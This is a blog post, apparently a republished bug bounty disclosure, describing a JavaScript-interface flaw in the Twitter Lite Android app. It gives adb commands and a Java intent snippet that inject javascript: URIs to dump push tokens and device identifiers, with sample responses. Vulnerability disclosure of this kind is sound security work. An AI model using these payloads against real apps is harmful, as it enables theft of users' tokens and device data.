Posted on by Editorial Team

Twitter Android Javascript Interface Vulnerability

Summary: com.twitter.android.lite.TwitterLiteActivity was set to exported, data passed to intent was not validated and its web view has JSInterface that available to any URL which was loaded through this activity as well as insecure schemes like file, javascript was available through intent.

Steps To Reproduce:

Get victim’s token through jsinterface:

  • loop through each of the window elements stored in the webview:

adb shell am start -a “android.intent.action.VIEW” -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d “javascript://google.com%0Ajavascript:Object.getOwnPropertyNames(window).forEach(function(v%2C%20x)%20%7B%20document.writeln(v)%3B%20%7D)%3B”

At the bottom of the response there is an element called “apkInterface”, this is a javascript interface between the app and backend.

  • We can see what’s available in apkInterface:

adb shell am start -a “android.intent.action.VIEW” -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d “javascript://google.com%0Ajavascript:Object.getOwnPropertyNames(window.apkInterface).forEach(function(v%2C%20x)%20%7B%20document.writeln(v)%3B%20%7D)%3B”

here was two function interesting: getApkPushParams and getNymizerParams

  • Lets call this function:

adb shell am start -a “android.intent.action.VIEW” -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d “javascript://google.com%0Ajavascript:document.write(apkInterface.getApkPushParams())%3B”

Response : {“payload”:{“client_application_id”:141373,”push_device_info”:{“env”:3,”locale”:”en-IN”,”os_version”:”24″,”token”:”Removed-XIHCvjwARIg8FL8TYxwJZL-TeN4caodfWnpXvV-Removed-UcglqNu3MHbDQVRgR”,”udid”:”800a1bb6e7192d”}},”headers”:{“x-twitter-client-version”:”apk.2.1.0–25″}}

adb shell am start -a “android.intent.action.VIEW” -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d “javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams())%3B”

Response: {“aid”:”bf49d6c0-1fec-492f-95af-b81dbf680350″,”limit_ad_tracking”:0,”country_code”:”IN”,”dev_brand”:”xiaomi”,”dev_model”:”Redmi Note 4″,”dev_carrier”:”Jio 4G”,”lang”:”English”,”os_ver”:24,”ts”:1551107789748,”os_name”:”android”,”action”:”open”,”ref”:”javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());”}

We could also reproduce above using third party app with below snippet:

Intent intent = new Intent();
intent.setClassName("com.twitter.android.lite", "com.twitter.android.lite.TwitterLiteActivity");
intent.setData(Uri.parse("javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());"));
startActivity(intent);

Happy Hunting )